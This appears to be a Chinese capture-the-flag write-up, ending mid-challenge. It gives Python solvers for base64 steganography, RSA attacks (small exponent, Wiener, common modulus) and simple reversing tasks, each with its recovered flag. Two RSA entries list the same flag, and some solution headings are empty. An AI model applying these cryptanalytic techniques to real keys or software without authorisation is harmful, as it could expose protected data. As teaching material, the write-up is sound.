ZiBIaXN0aWFldXMsIHdobyBzaGF2ZWQgdGhlIGhlYWQgb2YgaGlzIG1vc3QgdHJ1c3RlZCBz bGF2ZSBhbmQgdGF0dG9vZWQgYSBtZXNzYWdlIG9uIGl0LiBBZnRlciBoaXMgaGFpciBoYWQgZ5== cm93biB0aGUgbWVzc2FnZSB3YXMgaGlkZGVuLiBUaGUgcHVycG9zZSB3YXMgdG+= IGluc3RpZ2F0ZSBhIHJldm9sdCBhZ2FpbnN0IHRoZSBQZXJzaWFucy4NCg0KU3RlZ2Fub2dyYXBoeSBoYXMgYm== ZWVuIHdpZGVseSB1c2VkLCBpbmNsdWRpbmcgaW4gcmVjZW50IGhpc3RvcmljYWwgdGltZXMgYW5kIHT= aGUgcHJlc2VudCBkYXkuIFBvc3NpYmxlIHBlcm11dGF0aW9ucyBhcmUgZW5kbGVzcyBhbmT= IGtub3duIGV4YW1wbGVzIGluY2x1ZGU6DQoqIEhpZGRlbiBtZXNzYWdlcyB3aXRoaW4gd2F4IHRh YmxldHM6IGluIGFuY2llbnQgR3JlZWNlLCBwZW9wbGUgd3JvdGUgbWV= c3NhZ2VzIG9uIHRoZSB3b29kLCB0aGVuIGNvdmVyZWQgaXQgd2l0aCB3YXggdXBvbiB3aGljaCBhbiBpbm5vY2Vu dCBjb3ZlcmluZyBtZXNzYWdlIHdhcyB3cml0dGVu Lg0KKiBIaWRkZW4gbWVzc2FnZXMgb24gbWVzc2VuZ2VyJ3MgYm9keTogYWxzbyB1c2VkIGluIGFuY2llbt== dCBHcmVlY2UuIEhlcm9kb3R1cyB0ZWxscyB0aGUgc3Rvcnkgb1== ZiBhIG1lc3NhZ2UgdGF0dG9vZWQgb24gYSBzbGF2ZSdzIHNoYXZlZCBoZWFkLCBoaWRkZW4gYnkgdGhl IGdyb3d0aCBvZiBoaXMgaGFpciwgYW5kIGV4cG9zZWQgYnkgc2hhdmluZyBoaXMgaGVhZM== IGFnYWluLiBUaGUgbWVzc2FnZSBhbGxlZ2VkbHkgY2FycmllZCBhIHdhcm5pbmcgdG8gR3JlZWNlIGFib5== dXQgUGVyc2lhbiBpbnZhc2lvbiBwbGFucy4gVGh= aXMgbWV0aG9kIGhhcyBvYnZpb3VzIGRyYXdiYWNrcyz= IHN1Y2ggYXMgZGVsYXllZCB0cmFuc21pc3Npb24gd2hpbGUgd2FpdGluZyBmb3IgdGhlIHP= bGF2ZSdzIGhhaXIgdG8gZ3JvdywgYW5kIHRoZSByZXN0cmljdGlvbnMgb3== biB0aGUgbnVtYmVyIGFuZCBzaXplIG9mIG1lc3M= YWdlcyB0aGF0IGNhbiBiZSBlbmNvZGVkIG9uIG9uZSBwZXJzb24= J3Mgc2NhbHAuDQoqIEluIFdXSUksIHRoZSBGcmVuY2ggUmVzaXN0YW5jZSBzZW50IHNvbWUgbWVzc2FnZXMgd2== cml0dGVuIG9uIHRoZSBiYWNrcyBvZiBjb3VyaWVycyD= dXNpbmcgaW52aXNpYmxlIGluay4NCiogSGlkZGVuIG1lc3NhZ2VzIG9uIHBhcGVyIHdy aXR0ZW4gaW4gc2VjcmV0IGlua3MsIHVuZGVyIG90aGVyIG1lc3NhZ2Vz IG9yIG9uIHRoZSBibGFuayBwYXJ0cyBvZiBvdGhlct== IG1lc3NhZ2VzLg0KKiBNZXNzYWdlcyB3cml0dGVuIGluIE1vcnNlIGNvZGUgb24ga25pdHRpbmcgeWFybiBhbmQg dGhlbiBrbml0dGVkIGludG8gYSBwaWVjZSBvZiBjbG90aGluZyB3b3K= biBieSBhIGNvdXJpZXIuDQoqIE1lc3NhZ2VzIHdyaXR0ZW4gb24gdGhlIGJhY2sgb5== ZiBwb3N0YWdlIHN0YW1wcy4NCiogRHVyaW5nIGFuZCBhZnRlcm== IFdvcmxkIFdhciBJSSwgZXNwaW9uYWdlIGFnZW50cyB1c2VkIHBob3RvZ3JhcGhpY2FsbHkgcO== cm9kdWNlZCBtaWNyb2RvdHMgdG8gc2VuZCBpbmZvcm1hdGlvbiBiYWNrIGFuZH== IGZvcnRoLiBNaWNyb2RvdHMgd2VyZSB0eXBpY2FsbHkg bWludXRlLCBhcHByb3hpbWF0ZWx5IGxlc3MgdGhhbiB0aGUgc2l6ZSBvZiB0aGUgcGVyaW9kIHByb2R= dWNlZCBieSBhIHR5cGV3cml0ZXIuIFdXSUkgbWljcm9kb3RzIG5lZWRlZCB0byBiZSBlbWJlZGRlZB== IGluIHRoZSBwYXBlciBhbmQgY292ZXJlZCB3aXRoIGFuIGFkaGVzaXZlIChzdWNoIGFzIGNvbGxvZGlvbikuIFR= aGlzIHdhcyByZWZsZWN0aXZlIGFuZCB0aHVzIGRldGVjdGFibGUg Ynkgdmlld2luZyBhZ2FpbnN0IGdsYW5jaW5nIGxpZ2h0LiBBbHRlcm5hdGl2ZSB0ZWNobmlxdWVzIGluY2x1ZGVk IGluc2VydGluZyBtaWNyb2RvdHMgaW50byBzbGl0cyBjdXQgaW50byB0aGUgZWRnZSBvZv== IHBvc3QgY2FyZHMuDQoqIER1cmluZyBXb3JsZCBXYXIgSUksIGEgc3B5IGZvciB= SmFwYW4gaW4gTmV3IFlvcmsgQ2l0eSwgVmVsdmFsZWW= IERpY2tpbnNvbiwgc2VudCBpbmZvcm1hdGlvbiB0byBhY2NvbW1vZGF0aW9= biBhZGRyZXNzZXMgaW4gbmV1dHJhbCBTb3V0aCBBbWVyaWO= YS4gU2hlIHdhcyBhIGRlYWxlciBpbiBkb2xscywgYW5kIG== aGVyIGxldHRlcnMgZGlzY3Vzc2VkIGhvdyBtYW55IG9mIHRoaXMgb3IgdGhhdCBkb2xs IHRvIHNoaXAuIFRoZSBzdGVnb3RleHQgd2FzIHRoZSBkb2xsIG9yZGVycywgd2hpbGUgdGhl IGNvbmNlYWxlZCAicGxhaW50ZXh0IiB3YXMgaXRzZWxmIGVuY2+= ZGVkIGFuZCBnYXZlIGluZm9ybWF0aW9uIGFib3V0IHNoaXAgbW92ZW1lbnRzLF== IGV0Yy4gSGVyIGNhc2UgYmVjYW1lIHNvbWV3aGF0IGZh bW91cyBhbmQgc2hlIGJlY2FtZSBrbm93biBhcyB0aGX= IERvbGwgV29tYW4uDQoqIENvbGQgV2FyIGNvdW50 ZXItcHJvcGFnYW5kYS4gSW4gMTk2OCwgY3JldyBtZW1iZW== cnMgb2YgdGhlIFVTUyBQdWVibG8gKEFHRVItMikgaW50ZWxsaWdlbmNlIHNoaXAgaGVsZCBhcyBwcm== aXNvbmVycyBieSBOb3J0aCBLb3JlYSwgY29tbXVuaWNhdGVkIGluIHNpZ25= IGxhbmd1YWdlIGR1cmluZyBzdGFnZWQgcGhvdG8gb3Bwb3J0 dW5pdGllcywgaW5mb3JtaW5nIHRoZSBVbml0ZWQgU3RhdGVzIHRoZXkg d2VyZSBub3QgZGVmZWN0b3JzIGJ1dCByYXRoZXIgd2VyZSBiZWluZyBoZWxkIGNh cHRpdmUgYnkgdGhlIE5vcnRoIEtvcmVhbnMuIEluIG90aGVyIHBob3Rv cyBwcmVzZW50ZWQgdG8gdGhlIFVTLCBjcmV3IG1lbWJlcnMgZ2F2ZSAidGhlIGZpbmdlciIgdG8g dGhlIHVuc3VzcGVjdGluZyBOb3J0aCBLb3JlYW5zLCBpbiBhbiBhdHRlbXB0IHRvIE== ZGlzY3JlZGl0IHBob3RvcyB0aGF0IHNob3dlZCB0aGVtIHNtaQ== bGluZyBhbmQgY29tZm9ydGFibGUuDQoNCi0tDQpodHRwOi8vZW4ud2lraXBlZGlhLm9yZw== L3dpa2kvU3RlZ2Fub2dyYXBoeQ0K
import base64 def get_diff(s1, s2): base64chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/' res = 0 for i in range(len(s2)): if s1[i] != s2[i]: return abs(base64chars.index(s1[i]) - base64chars.index(s2[i])) #隐写值与正常加密的值做差,得出隐写信息 return res def b64_stego_decode(): file = open("stego.txt","rb") x = '' # x即bin_str lines = file.readlines() print(len(lines)) for line in lines: l = str(line, encoding = "utf-8") stego = l.replace('\n','') #print(stego) realtext = base64.b64decode(l) #print(realtext) realtext = str(base64.b64encode(realtext),encoding = "utf-8") #print(realtext) diff = get_diff(stego, realtext) # diff为隐写字串与实际字串的二进制差值 n = stego.count('=') if diff: x += bin(diff)[2:].zfill(n*2) else: x += '0' * n*2 i = 0 flag = '' while i < len(x): if int(x[i:i+8],2): flag += chr(int(x[i:i+8],2)) i += 8 print(len(flag)) print(flag) if __name__ == '__main__': b64_stego_decode()
flag{Base_sixty_four_point_five}
* rsa低加密指数小明文
- 题目
n = 1095193501314071508992184356698396498575993903902645176736824248626203423178058582980052056709470835349461883611907327333787476380807006829079149314187911076379180537479205152791331657276201370436693788845669156157605617438343332630668947137747409198034213068554850351851691 e = 3 c = 26957748170151919359681404117038763858559543976167222472065679376272566294346163463362841607862769232841859888042233434558282075299993159865541365966460870384341918224255038862662419746644668349966761257524859531569439368239059072753259426203046522626624370137714579366927 求明文m。
import libnum import gmpy2 n = 1095193501314071508992184356698396498575993903902645176736824248626203423178058582980052056709470835349461883611907327333787476380807006829079149314187911076379180537479205152791331657276201370436693788845669156157605617438343332630668947137747409198034213068554850351851691 e = 3 c = 26957748170151919359681404117038763858559543976167222472065679376272566294346163463362841607862769232841859888042233434558282075299993159865541365966460870384341918224255038862662419746644668349966761257524859531569439368239059072753259426203046522626624370137714579366927 def exp(n, e, c): k = 0 while 1: m1 = k * n + c m, t = gmpy2.iroot(m1, e) print(m,t) if t: print(m) print(k) print(libnum.n2s(int(m))) break k += 1 exp(n, e, c)
flag{20d6e2da95dcc1fa5f5432a436c4be18}
* rsa低解密指数1
- 题目
n = 113881698992379349039968368927979997900777221951663104697020683691495129639829918739755194174063944178083527489820939138302751895652076620380510013941997706327553964127612610209509889011613768847759318892303231846117914554931459295347697888260576901354448014917692680573408654658384481284699735788978230690197 e = 39068960413447607023613035707248214114819409621234801785480423979473767995171860917209502861408393208940683687475760366491413173744775811644295874981290403938714121977201901942939425294427737703229098649131737380098596135730392902019429964095866394165971291108245774407908011073271822915371753470010435225545 c = 32897925577913728659288168937025744709859960639901500169867896018406263110205704273203287172003057450591000201857719871686024077615520906540631374442504017489026298422189715372129838501090730593164075113452055617571409044743698645392909829425374093273187125709095368164744188182156849031225036001381531504057 求明文m。
import gmpy2 import libnum def continuedFra(x, y): """计算连分数 :param x: 分子 :param y: 分母 :return: 连分数列表 """ cf = [] while y: cf.append(x // y) x, y = y, x % y return cf def gradualFra(cf): """计算传入列表最后的渐进分数 :param cf: 连分数列表 :return: 该列表最后的渐近分数 """ numerator = 0 denominator = 1 for x in cf[::-1]: # 这里的渐进分数分子分母要分开 numerator, denominator = denominator, x * denominator + numerator return numerator, denominator def solve_pq(a, b, c): """使用韦达定理解出pq,x^2−(p+q)∗x+pq=0 :param a:x^2的系数 :param b:x的系数 :param c:pq :return:p,q """ par = gmpy2.isqrt(b * b - 4 * a * c) return (-b + par) // (2 * a), (-b - par) // (2 * a) def getGradualFra(cf): """计算列表所有的渐近分数 :param cf: 连分数列表 :return: 该列表所有的渐近分数 """ gf = [] for i in range(1, len(cf) + 1): gf.append(gradualFra(cf[:i])) return gf def wienerAttack(e, n): """ :param e: :param n: :return: 私钥d """ cf = continuedFra(e, n) gf = getGradualFra(cf) for d, k in gf: if k == 0: continue if (e * d - 1) % k != 0: continue phi = (e * d - 1) // k p, q = solve_pq(1, n - phi + 1, n) if p * q == n: return d n = 113881698992379349039968368927979997900777221951663104697020683691495129639829918739755194174063944178083527489820939138302751895652076620380510013941997706327553964127612610209509889011613768847759318892303231846117914554931459295347697888260576901354448014917692680573408654658384481284699735788978230690197 e = 39068960413447607023613035707248214114819409621234801785480423979473767995171860917209502861408393208940683687475760366491413173744775811644295874981290403938714121977201901942939425294427737703229098649131737380098596135730392902019429964095866394165971291108245774407908011073271822915371753470010435225545 c = 32897925577913728659288168937025744709859960639901500169867896018406263110205704273203287172003057450591000201857719871686024077615520906540631374442504017489026298422189715372129838501090730593164075113452055617571409044743698645392909829425374093273187125709095368164744188182156849031225036001381531504057 d = wienerAttack(e, n) m = pow(c, d, n) print(libnum.n2s(m))
flag{20d6e2da95dcc1fa5f5432a436c4be18}
* rsa
- 题目
n=7988529900473105188014389056967960086936563867296757743521892517247936779322720860255444942930780242155210428532146832008713545175918837530905634445325434613286924351618434540099301502911121639999829834740539924265403662987413432992208955495360228174246357622824377495215804134031877852138419718863284041289967061947755471763445733857978070389788375692135682151280752698874962994309945007125140767713724007845018476511899517159255148049315657598732020980883906731666463222483082276200161006441236070632697370371903500101576784959354977554163415267670823573732279121475839359214571761531246288036446226453068425024510743430878895525069620567890490274176825219357359655054978914573683875407955166777928775686025208785359965308175183659767780483671664211850622777921251850575660515358213546002740078882179081879033533365462914306416084244064896545443160983307728785861578564664478989753888306751232356332190121325366431859545371415091670360260190699271133604911289835196596206112433828316266654787633268647464346977673202417551515190318166560434792723729979761884387433899987302192101282176134274993622472541295926147573968989742934976154219591883259771200235375181747502029986832498546072186095479928492351 e1*e2=12349 c1=3956941104485053740097867778863463614429523343802296956471207970766235827952284925375087827795398315065603371450397005812384369786270566468341680820768090028044060468385762612396806935151008409193225425849238432409779352207959601347819331509515142408073169950950260068253219043764412165896916157009543178713020910451557374200427834677059361484489014235064296816116750618582307178177624023709365116378669877631012092848323856887350562541185114608178800058247774480383468504515276293218883642235538269485922732048635945261217203958458777210312461803766231193060881859101042463516118251171784131103804920788352354253909269981900724568137387512987776233999939685033257641191756640718996088154059932650574786345139374148096160762489179144433042422947138557706133141328198729630422754608099697399786108410452796399199904862710178981499375104806904012474580305064294378920608192083444296846169807188253384131823042010303863827711800536625250704063697267629139677266911064618161509078464307097931159951662665685590708492737629563830569911494186947500940490462552820677028344009105765700117517667727014044362864193958365235369782682160000975318516878081759300120335955961150426969912205482822422497294769070680558 c2=1611940015492237858734731702416679090527122709543998562457396582209482921996167319257124263097776719083735533237359282108951840302669400445723290521920778184957860968216955597796434242686387404340853070416671523333827453405378647122312410127116318173381005525906082911269068553644644687609522613704444374579284161594599287938530700830556279127294475519951575045281226065650043844322595522346835332161509830588432537394554004256279802459134435840152155349634866683628780452356511457368210177354837047964988830898418878925069850625303836559634386824904968394360298086999981372436634510871942249878916273086844819675445351650123995763782188534016623013711605415605757989536914844309859096018043139418213410907114483499986615333150567142484962965907979139743566212548602403120444967703145672734078988858122904884088935675452598837463766330894768372179433372531569766978092970858695058828452517992162674715013885642462261934681521697545980035382434568350477172292899604737668561976236375414170887395156146582284416539097502461258716445414441484365722004922543262378425518610840027621580310696876593038167054979299971052068452069502358975143777736130577413933906539382852391849708474118868998134460377344868062 求明文m。
import libnum import gmpy2 n=7988529900473105188014389056967960086936563867296757743521892517247936779322720860255444942930780242155210428532146832008713545175918837530905634445325434613286924351618434540099301502911121639999829834740539924265403662987413432992208955495360228174246357622824377495215804134031877852138419718863284041289967061947755471763445733857978070389788375692135682151280752698874962994309945007125140767713724007845018476511899517159255148049315657598732020980883906731666463222483082276200161006441236070632697370371903500101576784959354977554163415267670823573732279121475839359214571761531246288036446226453068425024510743430878895525069620567890490274176825219357359655054978914573683875407955166777928775686025208785359965308175183659767780483671664211850622777921251850575660515358213546002740078882179081879033533365462914306416084244064896545443160983307728785861578564664478989753888306751232356332190121325366431859545371415091670360260190699271133604911289835196596206112433828316266654787633268647464346977673202417551515190318166560434792723729979761884387433899987302192101282176134274993622472541295926147573968989742934976154219591883259771200235375181747502029986832498546072186095479928492351 e1=233 e2=53 c1=3956941104485053740097867778863463614429523343802296956471207970766235827952284925375087827795398315065603371450397005812384369786270566468341680820768090028044060468385762612396806935151008409193225425849238432409779352207959601347819331509515142408073169950950260068253219043764412165896916157009543178713020910451557374200427834677059361484489014235064296816116750618582307178177624023709365116378669877631012092848323856887350562541185114608178800058247774480383468504515276293218883642235538269485922732048635945261217203958458777210312461803766231193060881859101042463516118251171784131103804920788352354253909269981900724568137387512987776233999939685033257641191756640718996088154059932650574786345139374148096160762489179144433042422947138557706133141328198729630422754608099697399786108410452796399199904862710178981499375104806904012474580305064294378920608192083444296846169807188253384131823042010303863827711800536625250704063697267629139677266911064618161509078464307097931159951662665685590708492737629563830569911494186947500940490462552820677028344009105765700117517667727014044362864193958365235369782682160000975318516878081759300120335955961150426969912205482822422497294769070680558 c2=1611940015492237858734731702416679090527122709543998562457396582209482921996167319257124263097776719083735533237359282108951840302669400445723290521920778184957860968216955597796434242686387404340853070416671523333827453405378647122312410127116318173381005525906082911269068553644644687609522613704444374579284161594599287938530700830556279127294475519951575045281226065650043844322595522346835332161509830588432537394554004256279802459134435840152155349634866683628780452356511457368210177354837047964988830898418878925069850625303836559634386824904968394360298086999981372436634510871942249878916273086844819675445351650123995763782188534016623013711605415605757989536914844309859096018043139418213410907114483499986615333150567142484962965907979139743566212548602403120444967703145672734078988858122904884088935675452598837463766330894768372179433372531569766978092970858695058828452517992162674715013885642462261934681521697545980035382434568350477172292899604737668561976236375414170887395156146582284416539097502461258716445414441484365722004922543262378425518610840027621580310696876593038167054979299971052068452069502358975143777736130577413933906539382852391849708474118868998134460377344868062 def exp_def(e1,e2,c1,c2,n): s,s1,s2 = gmpy2.gcdext(e1, e2) m = gmpy2.iroot((pow(c1,s1,n) * pow(c2 ,s2 ,n)) % n,s)[0] return int(m) m=exp_def(e1,e2,c1,c2,n) print(libnum.n2s(m))
flag{f96b697d7cb7938d525a2f31aaf161d0}
- 解题思路
- 解题思路
* basebase
- 题目
VHdpbmtsZV90d2lua2xlX2xpdHRsZV9zdGFyDQp= SG93X0lfd29uZGVyX3doYXRfeW91X2FyZQ0K VXBfYWJvdmVfdGhlX3dvcmxk*X3NvX2hpZ2gNCp== TGlrZV9hX2RpYW1vbmRfaW5fdGhlX3NreQ0K VHdpbmtsZV90d2lua2xlX2xpdHRsZV9zdGFyDQq= SG93X0lfd29uZGVyX3doYXRfeW91X2FyZQ0K V2hlbl90aGVfYmxhemluZ19zdW5faXNfZ29uZQ0K V2hlbl9oZV9ub3RoaW5nX3NoaW5lc191cG9uDQp= VGhlbl95b3Vfc2hvd195b3VyX2xpdHRsZV9saWdodA0K VHdpbmtsZV90d2lua2xlX2FsbF90aGVfbmlnaHQNCp== VHdpbmtsZV90d2lua2xlX2xpdHRsZV9zdGFyDQr= SG93X0lfd29uZGVyX3doYXRfeW91X2FyZQ0K VGhlbl90aGVfdHJhdmVsbGVyX2luX3RoZV9kYXJrDQp= VGhhbmtzX3lvdV9mb3JfeW91cl90aW55X3NwYXJrDQr= Q291bGRfaGVfc2VlX3doaWNoX3dheV90b19nbw0K SWZfeW91X2RpZF9ub3RfdHdpbmtsZV9zbw0K VHdpbmtsZV90d2lua2xlX2xpdHRsZV9zdGFyDQp= SG93X0lfd29uZGVyX3doYXRfeW91X2FyZQ0K SW5fdGhlX2RhcmtfYmx1ZV9za3lfeW91X2tlZXANCl== T2Z0ZW5fdGhyb3VnaF9teV9jdXJ0YWluc19wZWVwDQq= Rm9yX3lvdV9uZXZlcl9zaHV0X3lvdXJfZXllDQo= VGlsbF90aGVfc3VuX2lzX2luX3RoZV9za3kNCl== VHdpbmtsZV90d2lua2xlX2xpdHRsZV9zdGFyDQq= VXBfYWJvdmVfdGhlX3dvcmxkX3NvX2hpZ2gNCq== VHdpbmtsZV90d2lua2xlX2xpdHRsZV9zdGFyDQp= SG93X0lfd29uZGVyX3doYXRfeW91X2FyZQ0K VXBfYWJvdmVfdGhlX3dvcmxkX3NvX2hpZ2gNCq== TGlrZV9hX2RpYW1vbmRfaW5fdGhlX3NreQ0K VHdpbmtsZV90d2lua2xlX2xpdHRsZV9zdGFyDQo= SG93X0lfd29uZGVyX3doYXRfeW91X2FyZQ0K V2hlbl90aGVfYmxhemluZ19zdW5faXNfZ29uZQ0K V2hlbl9oZV9ub3RoaW5nX3NoaW5lc191cG9uDQp= VGhlbl95b3Vfc2hvd195b3VyX2xpdHRsZV9saWdodA0K VHdpbmtsZV90d2lua2xlX2FsbF90aGVfbmlnaHQNCt== VHdpbmtsZV90d2lua2xlX2xpdHRsZV9zdGFyDQp= SG93X0lfd29uZGVyX3doYXRfeW91X2FyZQ0K VGhlbl90aGVfdHJhdmVsbGVyX2luX3RoZV9kYXJrDQp= VGhhbmtzX3lvdV9mb3JfeW91cl90aW55X3NwYXJrDQr= Q291bGRfaGVfc2VlX3doaWNoX3dheV90b19nbw0K SWZfeW91X2RpZF9ub3RfdHdpbmtsZV9zbw0K VHdpbmtsZV90d2lua2xlX2xpdHRsZV9zdGFyDQp= SG93X0lfd29uZGVyX3doYXRfeW91X2FyZQ0K SW5fdGhlX2RhcmtfYmx1ZV9za3lfeW91X2tlZXANCl== T2Z0ZW5fdGhyb3VnaF9teV9jdXJ0YWluc19wZWVwDQr= Rm9yX3lvdV9uZXZlcl9zaHV0X3lvdXJfZXllDQr= VGlsbF90aGVfc3VuX2lzX2luX3RoZV9za3kNCl== VHdpbmtsZV90d2lua2xlX2xpdHRsZV9zdGFyDQq= VXBfYWJvdmVfdGhlX3dvcmxkX3NvX2hpZ2gNCs== VHdpbmtsZV90d2lua2xlX2xpdHRsZV9zdGFyDQp= SG93X0lfd29uZGVyX3doYXRfeW91X2FyZQ0K VXBfYWJvdmVfdGhlX3dvcmxkX3NvX2hpZ2gNCu== TGlrZV9hX2RpYW1vbmRfaW5fdGhlX3NreQ0K VHdpbmtsZV90d2lua2xlX2xpdHRsZV9zdGFyDQr= SG93X0lfd29uZGVyX3doYXRfeW91X2FyZQ0K V2hlbl90aGVfYmxhemluZ19zdW5faXNfZ29uZQ0K V2hlbl9oZV9ub3RoaW5nX3NoaW5lc191cG9uDQp= VGhlbl95b3Vfc2hvd195b3VyX2xpdHRsZV9saWdodA0K VHdpbmtsZV90d2lua2xlX2FsbF90aGVfbmlnaHQNCr== VHdpbmtsZV90d2lua2xlX2xpdHRsZV9zdGFyDQr= SG93X0lfd29uZGVyX3doYXRfeW91X2FyZQ0K VGhlbl90aGVfdHJhdmVsbGVyX2luX3RoZV9kYXJrDQp= VGhhbmtzX3lvdV9mb3JfeW91cl90aW55X3NwYXJrDQq= Q291bGRfaGVfc2VlX3doaWNoX3dheV90b19nbw0K SWZfeW91X2RpZF9ub3RfdHdpbmtsZV9zbw0K VHdpbmtsZV90d2lua2xlX2xpdHRsZV9zdGFyDQr= SG93X0lfd29uZGVyX3doYXRfeW91X2FyZQ0K SW5fdGhlX2RhcmtfYmx1ZV9za3lfeW91X2tlZXANCp== T2Z0ZW5fdGhyb3VnaF9teV9jdXJ0YWluc19wZWVwDQq= Rm9yX3lvdV9uZXZlcl9zaHV0X3lvdXJfZXll]DQq= VGlsbF90aGVfc3VuX2lzX2luX3RoZV9za3kNCl== VHdpbmtsZV90d2lua2xlX2xpdHRsZV9zdGFyDQr= SG93X0lfd29uZGVyX3doYXRfeW91X2FyZV== VHdpbmtsZV90d2lua2xlX2xpdHRsZV9zdGFyDQp= SG93X0lfd29uZGVyX3doYXRfeW91X2FyZQ0K VXBfYWJvdmVfdGhlX3dvcmxkX3NvX2hpZ2gNCp== TGlrZV9hX2RpYW1vbmRfaW5fdGhlX3NreQ0K VHdpbmtsZV90d2lua2xlX2xpdHRsZV9zdGFyDQp= SG93X0lfd29uZGVyX3doYXRfeW91X2FyZQ0K V2hlbl90aGVfYmxhemluZ19zdW5faXNfZ29uZQ0K V2hlbl9oZV9ub3RoaW5nX3NoaW5lc191cG9uDQp= VGhlbl95b3Vfc2hvd195b3VyX2xpdHRsZV9saWdodA0K VHdpbmtsZV90d2lua2xlX2FsbF90aGVfbmlnaHQNCo== VHdpbmtsZV90d2lua2xlX2xpdHRsZV9zdGFyDQp= SG93X0lfd29uZGVyX3doYXRfeW91X2FyZQ0K VGhlbl90aGVfdHJhdmVsbGVyX2luX3RoZV9kYXJrDQp= VGhhbmtzX3lvdV9mb3JfeW91cl90aW55X3NwYXJrDQq= Q291bGRfaGVfc2VlX3doaWNoX3dheV90b19nbw0K SWZfeW91X2RpZF9ub3RfdHdpbmtsZV9zbw0K VHdpbmtsZV90d2lua2xlX2xpdHRsZV9zdGFyDQo= SG93X0lfd29uZGVyX3doYXRfeW91X2FyZQ0K SW5fdGhlX2RhcmtfYmx1ZV9za3lfeW91X2tlZXANCl== T2Z0ZW5fdGhyb3VnaF9teV9jdXJ0YWluc19wZWVwDQq= Rm9yX3lvdV9uZXZlcl9zaHV0X3lvdXJfZXllDQp= VGlsbF90aGVfc3VuX2lzX2luX3RoZV9za3kNCt== VHdpbmtsZV90d2lua2xlX2xpdHRsZV9zdGFyDQr= SG93X0lfd29uZGVyX3doYXRfeW91X2FyZX== VHdpbmtsZV90d2lua2xlX2xpdHRsZV9zdGFyDQp= SG93X0lfd29uZGVyX3doYXRfeW91X2FyZQ0K VXBfYWJvdmVfdGhlX3dvcmxkX3NvX2hpZ2gNCp== TGlrZV9hX2RpYW1vbmRfaW5fdGhlX3NreQ0K VHdpbmtsZV90d2lua2xlX2xpdHRsZV9zdGFyDQr= SG93X0lfd29uZGVyX3doYXRfeW91X2FyZQ0K V2hlbl90aGVfYmxhemluZ19zdW5faXNfZ29uZQ0K V2hlbl9oZV9ub3RoaW5nX3NoaW5lc191cG9uDQp= VGhlbl95b3Vfc2hvd195b3VyX2xpdHRsZV9saWdodA0K VHdpbmtsZV90d2lua2xlX2FsbF90aGVfbmlnaHQNCs== VHdpbmtsZV90d2lua2xlX2xpdHRsZV9zdGFyDQr= SG93X0lfd29uZGVyX3doYXRfeW91X2FyZQ0K VGhlbl90aGVfdHJhdmVsbGVyX2luX3RoZV9kYXJrDQp= VGhhbmtzX3lvdV9mb3JfeW91cl90aW55X3NwYXJrDQr= Q291bGRfaGVfc2VlX3doaWNoX3dheV90b19nbw0K SWZfeW91X2RpZF9ub3RfdHdpbmtsZV9zbw0K VHdpbmtsZV90d2lua2xlX2xpdHRsZV9zdGFyDQq= SG93X0lfd29uZGVyX3doYXRfeW91X2FyZQ0K SW5fdGhlX2RhcmtfYmx1ZV9za3lfeW91X2tlZXANCh== T2Z0ZW5fdGhyb3VnaF9teV9jdXJ0YWluc19wZWVwDQr= Rm9yX3lvdV9uZXZlcl9zaHV0X3lvdXJfZXllDQq= VGlsbF90aGVfc3VuX2lzX2luX3RoZV9za3kNCl== VHdpbmtsZV90d2lua2xlX2xpdHRsZV9zdGFyDQq= VXBfYWJvdmVfdGhlX3dvcmxkX3NvX2hpZ2gNCu==
import base64 def get_diff(s1, s2): base64chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/' res = 0 for i in range(len(s2)): if s1[i] != s2[i]: return abs(base64chars.index(s1[i]) - base64chars.index(s2[i])) #隐写值与正常加密的值做差,得出隐写信息 return res def b64_stego_decode(): file = open("处理过的文本.txt","rb") x = '' # x即bin_str lines = file.readlines() print(len(lines)) count=0 for line in lines: l = str(line, encoding = "utf-8") stego = l.replace('\n','') #print(stego) count=count+1 #用下面这条语句判定出,哪行有问题,然后眼睛找,手动改即可 print(count) realtext = base64.b64decode(l) #print(realtext) realtext = str(base64.b64encode(realtext),encoding = "utf-8") #print(realtext) diff = get_diff(stego, realtext) # diff为隐写字串与实际字串的二进制差值 n = stego.count('=') if diff: x += bin(diff)[2:].zfill(n*2) else: x += '0' * n*2 i = 0 flag = '' while i < len(x): if int(x[i:i+8],2): flag += chr(int(x[i:i+8],2)) i += 8 print(len(flag)) print(flag) if __name__ == '__main__': b64_stego_decode()
flag{guowangjishuxueyuan}
- 解题思路
- 解题思路
三、反编译可执行软件和解密
1. 反编译靶场解题
* 题目整体一览
* re1
a=[ 0xC6, 0x44, 0x24, 0x2F, 0x66, 0xC6, 0x44, 0x24, 0x2E, 0x6C,
0xC6, 0x44, 0x24, 0x2D, 0x61, 0xC6, 0x44, 0x24, 0x2C, 0x67,
0xC6, 0x44, 0x24, 0x2B, 0x7B, 0xC6, 0x44, 0x24, 0x2A, 0x52,
0xC6, 0x44, 0x24, 0x29, 0x65, 0xC6, 0x44, 0x24, 0x28, 0x5F,
0xC6, 0x44, 0x24, 0x27, 0x31, 0xC6, 0x44, 0x24, 0x26, 0x73,
0xC6, 0x44, 0x24, 0x25, 0x5F, 0xC6, 0x44, 0x24, 0x24, 0x53,
0xC6, 0x44, 0x24, 0x23, 0x30, 0xC6, 0x44, 0x24, 0x22, 0x5F,
0xC6, 0x44, 0x24, 0x21, 0x43, 0xC6, 0x44, 0x24, 0x20, 0x30,
0xC6, 0x44, 0x24, 0x1F, 0x4F, 0xC6, 0x44, 0x24, 0x1E, 0x4C,
0xC6, 0x44, 0x24, 0x1D, 0x7D ]
flag = ''
for i in range(4,len(a),5):
flag+=chr(a[i])
# pass
print(flag)
flag{Re_1s_S0_C0OL}
* re2
import base64
DICT='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='
DICT1='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ+/='
a='pCNxpTJ2d3d5nPoQnSAAnQBel4lihldkikV78nQ='
b=''
for i in range(len(a)):
b+=DICT[DICT1.index(a[i])]
print(b)
print(base64.b64decode(b))
flag{B43E_64_i$_INTERESTING!}
* re3
import base64
a='e3nifIH9b_C@n@dH'
flag=''
for i in range(len(a)):
flag+=chr(ord(a[i])-i)
print(flag)
flag{i_l0ve_you}
* re4
a=[0xC6, 0x45, 0xD0, 0x66, 0xC6, 0x45, 0xD1, 0xA0, 0xC6, 0x45,
0xD2, 0xB6, 0xC6, 0x45, 0xD3, 0xC0, 0xC6, 0x45, 0xD4, 0x77,
